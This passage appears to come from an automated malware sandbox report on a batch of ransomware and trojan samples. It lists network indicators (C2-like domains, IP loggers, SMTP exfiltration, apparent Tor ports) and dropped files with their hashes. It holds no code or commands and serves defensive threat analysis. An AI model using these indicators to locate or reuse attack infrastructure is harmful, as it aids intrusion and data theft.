| US | 185.199.110.133:443 | gist.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | gist.githubusercontent.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | speeddatingstudio.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| DE | 185.220.101.200:8443 | tcp | |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | f0558986.xsph.ru | udp |
| RU | 141.8.197.42:80 | f0558986.xsph.ru | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 8.8.8.8:53 | 200.101.220.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.219.218.216.in-addr.arpa | udp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 11.35.66.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.197.8.141.in-addr.arpa | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | pastebin.pl | udp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 104.21.46.76:443 | pastebin.pl | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 76.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | online-stock-solutions.com | udp |
| US | 8.8.8.8:53 | the-lead-bitter.com | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnu.ru | udp |
| US | 170.39.226.155:80 | ssofhoseuegsgrfnu.ru | tcp |
| US | 8.8.8.8:53 | ww88.ssofhoseuegsgrfnu.ru | udp |
| US | 199.59.243.226:80 | ww88.ssofhoseuegsgrfnu.ru | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 155.226.39.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.243.59.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | glitterandsparkle.net | udp |
| NL | 92.63.197.48:80 | tcp | |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | znpst.top | udp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| DE | 92.246.89.93:80 | znpst.top | tcp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.ru | udp |
| DE | 92.246.89.93:80 | slpsrgpsrhojifdij.ru | tcp |
| US | 8.8.8.8:53 | rlrz.org | udp |
| DE | 103.252.90.236:9200 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | 236.90.252.103.in-addr.arpa | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.ru | udp |
| DE | 92.246.89.93:80 | aiiaiafrzrueuedur.ru | tcp |
| MD | 176.123.8.5:9001 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 8.8.8.8:53 | 5.8.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.ru | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.ru | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.ru | udp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.ru | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.ru | udp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.ru | udp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.ru | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | fiiauediehduefuge.ru | udp |
| US | 44.221.84.105:80 | fiiauediehduefuge.ru | tcp |
| US | 8.8.8.8:53 | 105.84.221.44.in-addr.arpa | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.ru | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.ru | udp |
| US | 8.8.8.8:53 | eofihsishihiursgu.ru | udp |
| US | 8.8.8.8:53 | nnososoosjfeuhueu.ru | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.su | udp |
| DE | 92.246.89.93:80 | ssofhoseuegsgrfnj.su | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| SE | 188.151.237.158:443 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 158.237.151.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.su | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.su | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.su | udp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.su | udp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.su | udp |
| DE | 92.246.89.93:80 | afeifieuuufufufuf.su | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| GB | 178.79.163.170:9001 | tcp | |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | 170.163.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | fiiauediehduefuge.su | udp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.su | udp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eofihsishihiursgu.su | udp |
| US | 8.8.8.8:53 | nnososoosjfeuhueu.su | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.in | udp |
| US | 208.100.26.245:80 | ssofhoseuegsgrfnj.in | tcp |
| US | 8.8.8.8:53 | 245.26.100.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.in | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.in | udp |
| US | 104.21.46.76:443 | pastebin.pl | tcp |
| US | 44.213.104.86:80 | eiifngjfksisiufjf.in | tcp |
| US | 8.8.8.8:53 | 86.104.213.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| DE | 46.232.251.191:444 | tcp | |
| NL | 45.66.35.11:80 | 45.66.35.11 | tcp |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | 191.251.232.46.in-addr.arpa | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.in | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.in | udp |
| US | 44.221.84.105:80 | iuirshriuisruruuf.in | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.in | udp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.in | udp |
| US | 8.8.8.8:53 | fiiauediehduefuge.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.in | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.in | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eofihsishihiursgu.in | udp |
| US | 8.8.8.8:53 | nnososoosjfeuhueu.in | udp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.net | udp |
| SG | 13.251.16.150:80 | slpsrgpsrhojifdij.net | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.net | udp |
| RU | 185.215.113.66:80 | aiiaiafrzrueuedur.net | tcp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fuaiuebndieufeufu.net | udp |
| US | 8.8.8.8:53 | eiifngjfksisiufjf.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | eoroooskfogihisrg.net | udp |
| US | 8.8.8.8:53 | noeuaoenriusfiruu.net | udp |
| US | 8.8.8.8:53 | iuirshriuisruruuf.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | afeifieuuufufufuf.net | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
| CA | 144.217.32.158:9003 | tcp | |
| DE | 193.23.244.244:80 | 193.23.244.244 | tcp |
| US | 216.218.219.41:80 | 216.218.219.41 | tcp |
| US | 8.8.8.8:53 | srndndubsbsifurfd.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | fiiauediehduefuge.net | udp |
| US | 8.8.8.8:53 | nousiieiffgogogoo.net | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| SG | 18.141.10.107:80 | nousiieiffgogogoo.net | tcp |
| US | 8.8.8.8:53 | 107.10.141.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fifiehsueuufidhfi.net | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 172.67.144.121:443 | bossdata.pro | tcp |
| US | 8.8.8.8:53 | eofihsishihiursgu.net | udp |
| US | 44.213.104.86:80 | eofihsishihiursgu.net | tcp |
| US | 8.8.8.8:53 | ssofhoseuegsgrfnj.biz | udp |
| US | 54.244.188.177:80 | ssofhoseuegsgrfnj.biz | tcp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | 177.188.244.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkip.dyndns.org | udp |
| DE | 193.122.6.168:80 | checkip.dyndns.org | tcp |
| US | 8.8.8.8:53 | slpsrgpsrhojifdij.biz | udp |
| RU | 77.88.21.158:587 | smtp.yandex.com.tr | tcp |
| US | 8.8.8.8:53 | 168.6.122.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | doddyfire.dyndns.org | udp |
| US | 8.8.8.8:53 | aiiaiafrzrueuedur.biz | udp |
Files
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
| MD5 | a8f2c9b1c6dc9022290900cbf27af571 |
| SHA1 | 0bd9ba9ebaf967649c102989a1b28394840106ee |
| SHA256 | d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b |
| SHA512 | 60f92d9829283ce05f8aaa13466d572e8772d29b699f782f37bb05d232dcf33bca883f1549e2b6ac9d211b7879042f25a973a57460548e7ba4fafbe057826d29 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
| MD5 | 31cf5a53a640bc9a073cbe777a2183ce |
| SHA1 | 10941c1910e473bf0b8fb0617bf5f39bda577d81 |
| SHA256 | c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1 |
| SHA512 | 4d59ff48d939016a001ad18819e115c9c3a83bc6d41d5ce6ff9ceb0496753e53ac61420eb061235ffac5dd3d2e84cf6f07c87db11cc151cfc96a94c4b6eea0e8 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan.Win32.Kryptik.gen-0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0.exe
| MD5 | 7bf5be704b75c4924b5a29a8ab05ea30 |
| SHA1 | 53aa3fd3f60aad9b980cb3ed0d1f169add0530b6 |
| SHA256 | 0da5a04cdcc8fec504878f3b3062ac390b49ff6f0a304cd2e08c7b344a0aeab0 |
| SHA512 | be3487e110e5dd9db83b3f0cd1b6e467cf06b613a4bc19cb3bae66100d0bc827948a36c67a78fadca3f88503dbc5bf7eb931a1c4f89318cd0fe167127e5ced42 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\HEUR-Trojan.Win64.Kryptik.gen-6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81.exe
| MD5 | 448096c67b45deb3c7593aa88fb86b75 |
| SHA1 | c60c8cc75a3a2950dcb78fc4094007b13c7b099f |
| SHA256 | 6442c3d57a02a1469c283a3a1a170fdc31b412993de9806b2738e73501ce0e81 |
| SHA512 | 042f276950948d7d7ba3f3965525cb0c64277b7f31e12742bb280e1b520dbb74274253eae748a148d68ee93eb713930bec0b7499a2e5f0202ba0b74975a8d237 |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.Cryptodef.aoo-fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc.exe
| MD5 | 18ffed6f715aea3ba8cd567b330faf20 |
| SHA1 | 8f835470057ba4f832e812fc9f58dd42c0a7acc4 |
| SHA256 | fffbd669ccfaca780362d00cc3d7b165bb9f68a3902dc1fa9a099ecb706f3adc |
| SHA512 | c863ac250d1dac03362ce0fd9b5f3ccb0e45084e0715533dede7ab420eb7b4a7fb58228ad3d9c516352a8474ff07c205c64e7709b9d5a7ee5490bfa6e10e51ff |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.GenericCryptor.czo-877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66.exe
| MD5 | 03531048f4d9369c850888945181cf43 |
| SHA1 | 1e214deb22fa4dd095d9351d91ac5563aad5e7ba |
| SHA256 | 877fe5837cf0d0c2637ef6728da31841094501dc61257722698b38828f895f66 |
| SHA512 | f312faed2f987a9da2ee145f078645825f2785ce483ded263fa3b3d6a884a5e67cad3ffde8dff4a82c67b010262926365d8f947c74dec04a26ee2703f2ecdbea |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan-Ransom.Win32.GenericCryptor.czx-e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894.exe
| MD5 | e3584b71a215db2c629e6e2877edd6b4 |
| SHA1 | 01bee60375b7a275f818b051ddc0ddb4a8426006 |
| SHA256 | e15b06cf1255a93e42d5d558c3e65f09dac5c8564873d359da061b78be324894 |
| SHA512 | d57474c0cdf0df95b703afbfb1f801765b4fe1030eff1fc1ef971da0392474c585f0c5ce57918528d0a61fce6feaf49b0a80e614f183fede6aa74f6436ea94bf |
C:\Users\Admin\AppData\Local\Temp\7zECCF816C7\00486\Trojan.Win32.Kryptik.bvw-f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe.exe
| MD5 | b678abc39649637794c067fd5b887084 |
| SHA1 | 52fd922bd1cbddc73b392611e1df9457a3fd0fd8 |
| SHA256 | f3cdb519cba210689a115f86cf1554b3edcad5e12746e109ca7e373caad24fbe |
| SHA512 | 7fdbcd04119d39eff57094b43471fd902fcdec2b7b286d1d278123d8e85c56a37b2d9451d1afbf1ff6dfbc2fc6e9d9ca256b30fd4a01ce8e3a92088ceb2585ea |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kopcyc0s.je4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3412-697-0x000002673BB60000-0x000002673BB82000-memory.dmp
memory/3412-702-0x000002673C2B0000-0x000002673C2F4000-memory.dmp
memory/3412-703-0x000002673C380000-0x000002673C3F6000-memory.dmp
memory/3412-704-0x000002673C340000-0x000002673C35E000-memory.dmp
memory/4560-707-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-709-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-708-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-719-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-718-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-717-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-716-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-715-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-714-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
memory/4560-713-0x0000024E5A8E0000-0x0000024E5A8E1000-memory.dmp
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx
| MD5 | d2fb266b97caff2086bf0fa74eddb6b2 |
| SHA1 | 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d |
| SHA256 | b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a |
| SHA512 | c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock
| MD5 | f49655f856acb8884cc0ace29216f511 |
| SHA1 | cb0f1f87ec0455ec349aaa950c600475ac7b7b6b |
| SHA256 | 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba |
| SHA512 | 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8 |
C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val
| MD5 | 6bd369f7c74a28194c991ed1404da30f |
| SHA1 | 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643 |
| SHA256 | 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d |
| SHA512 | 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93 |
C:\Users\Admin\Desktop\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
| MD5 | bd54078b9adbe209a3b2ce024ff94ba0 |
| SHA1 | 583786c790eee89fff045be901be6c8a2b7a1647 |
| SHA256 | 3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b |
| SHA512 | 218b5869e9cf06d4b5308770011cca8f2b9ac4f8ccb77448b61c11791cd52250bddb92bdca50225747be396972e749450046d37ec8fc7161e62230ab1a10d5cf |
memory/1968-737-0x0000000000400000-0x0000000000402000-memory.dmp
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
| MD5 | 015cb7762f15eaa2bedc61fa02486f4c |
| SHA1 | 8e152fc6a4f4c9f3226e8deca1e8ff76d15a49be |
| SHA256 | 30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23 |
| SHA512 | 95e5dc63428e71e4ab395d34ab855bea751343f267567eb43c461ae1e847a3460ea27e24a303fd5275f4608a5b5bdc18c08b59a2ed112049835f7bdc4d011384 |
\??\c:\users\admin\desktop\00486\heur-trojan-ransom.msil.blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
| MD5 | b9dee2e3d9527f4ebc3ac12a3d31fb85 |
| SHA1 | fe1bc21eeece8cea940687f5cdf0bb2ba4e12346 |
| SHA256 | 806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e |
| SHA512 | 7fb6df8cb2d8550432d06df799b87e38aa3b8520b5fb3829cde5c9694a3c3cc64f90169870ae4d3ed64edb9033661c25f198c68f5c8b3efd7188cdb16cd3a274 |
memory/2416-745-0x0000000000F90000-0x0000000000FC6000-memory.dmp
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
| MD5 | 108abda7915e7b2338376b4fc81a7e87 |
| SHA1 | 816f14dbb37b0f6bbf60541bf665e43c7dc2e410 |
| SHA256 | c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d |
| SHA512 | 2ffc6165be49ae2214313f3e5c1159980f5cab363b745a35ed6d3bf2d1d504e47b4ac101adc269d382a75fe2bfccbe2b94aa6dca3c3d3d864cf291975838efb7 |
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
| MD5 | 3876a3cdf0e2d715d4ab1cb3e4b1f056 |
| SHA1 | db205f5318852154bf64d6d1d6a5a6de7234542b |
| SHA256 | 183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20 |
| SHA512 | fcbf14e516e5f59a3161ba682826649c5bfb1cb7b0b8a957fa8017d3974d2d456ab74359dce138c8366f24194780dd424d6453a9a59e926e99bd188408f3facf |
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
| MD5 | 53b1e433b66ed04ab1204e8b3a9e9785 |
| SHA1 | 29c5e98ab1e93e118757c174eec0f7fedc1651d7 |
| SHA256 | 560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a |
| SHA512 | c0b680d88cbdf8851ee9c43a6778cd9e279c76abb3bb88a7361c4d54ea0cb175e41ec12b7a4c587876365331da52387a6e191ca62bfce2934bdc4a7bffae738a |
memory/1800-752-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3648-758-0x0000000004EF0000-0x0000000004F8C000-memory.dmp
memory/3648-757-0x00000000005B0000-0x00000000005C4000-memory.dmp
memory/3648-765-0x0000000005540000-0x0000000005AE4000-memory.dmp
memory/3648-766-0x0000000004F90000-0x0000000005022000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
| MD5 | 2f500f2ed58bdc8df3712e10456dbe60 |
| SHA1 | 13e97cdb2e1a9200d4c2032d2045a72b041fea6f |
| SHA256 | 4a016ff050c9b659c9d1ea1358758e016d8551eb2437973d6ab7355c6053251d |
| SHA512 | d27ea06bde3644b23ed5a2cc45dbf92239c932e2c5cafbaa5b51a2928d7366f5530d1e1a53f2ba5f298beafaa55185b10f47de1962d8ad179836cd648d9f144e |
C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
| MD5 | 7d945a6449b3c6005ad868c03fe95e76 |
| SHA1 | 53b7e5e40e588b72e07a626f05b43bfc29edfe32 |
| SHA256 | 86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe |
| SHA512 | 2a0d4dbdb108a30c6ba7fa48fb49dac85c753f2b78ff56d783a714ed59757b2e7c06d394d63a5fc7d1da4173eba5e04a9b061e37c439d78ee03dd27dfe0f29d3 |
C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs
| MD5 | 3d01ee4659d80173c2e4d6ad05922d60 |
| SHA1 | 982aaa71f725128aa73669c2869feff391797565 |
| SHA256 | 121f3478b61beff37c8a3f64f55ddbef4d2b8097f1c013d9a3ceb709bdc526c2 |
| SHA512 | b1d5a857f0aee8bd73095c714372ad4d7786d7ad4348275bae603a2e2644b87e3e4b2f0930d82b5cabcef59f92c93b940a29053a8dad4104509149e034c8fae1 |
memory/1800-785-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3976-782-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3648-778-0x0000000005120000-0x0000000005176000-memory.dmp
memory/3648-777-0x0000000004E70000-0x0000000004E7A000-memory.dmp
C:\Users\Admin\Desktop\00486\Setup.exe
| MD5 | 87213006cba133fd2f5556cab1b702a9 |
| SHA1 | f5ac580bdd63a4c3770602dd05f35ab1ac215191 |
| SHA256 | 504cdfbb04059dc8553c56d17f114f8b3e5f6ac050cab99de199b73e9f5c9608 |
| SHA512 | 1813b9d6d281bd467bbb11b2bb44da87389d873d6cccbe1af0dd242c21db9179c98ddb90f85c95587d367da1f5f049f9644abd4d0ae3dbf8af7387c75e2fa4c1 |
C:\Users\Admin\Desktop\00486\smss.exe
| MD5 | 3e0008cc2c154ed7421566bfbcef4c1b |
| SHA1 | d9541802d6743d8297e35df54b1e96dd0f0d798e |
| SHA256 | c8c5d40c561da8cd603ef7efbca59fc0a7c8463032469315d2d06d0cf01a3099 |
| SHA512 | 43008875d176fe858f698d0d934a81cef02d5c7313bd1652ec6566892f1ed505668643119deab28186ef5bebabf9f95fb421443959a1157e6f9d68a9bfec789e |
memory/4144-809-0x0000000000840000-0x0000000000846000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp
| MD5 | ae9890548f2fcab56a4e9ae446f55b3f |
| SHA1 | e17c970eebbe6d7d693c8ac5a7733218800a5a96 |
| SHA256 | 09af8004b85478e1eca09fa4cb5e3081dddcb2f68a353f3ef6849d92be47b449 |
| SHA512 | 154b6f66ff47db48ec0788b8e67e71f005b51434920d5d921ac2a5c75745576b9b960e2e53c6a711f90f110ad2372ef63045d2a838bc302367369ef1731c80eb |
C:\Users\Admin\AppData\Local\Temp\is-05PH2.tmp\idp.dll
| MD5 | af555ac9c073f88fe5bf0d677f085025 |
| SHA1 | 5fff803cf273057c889538886f6992ea05dd146e |
| SHA256 | f4fc0187491a9cb89e233197ff72c2405b5ec02e8b8ea640ee68d034ddbc44bb |
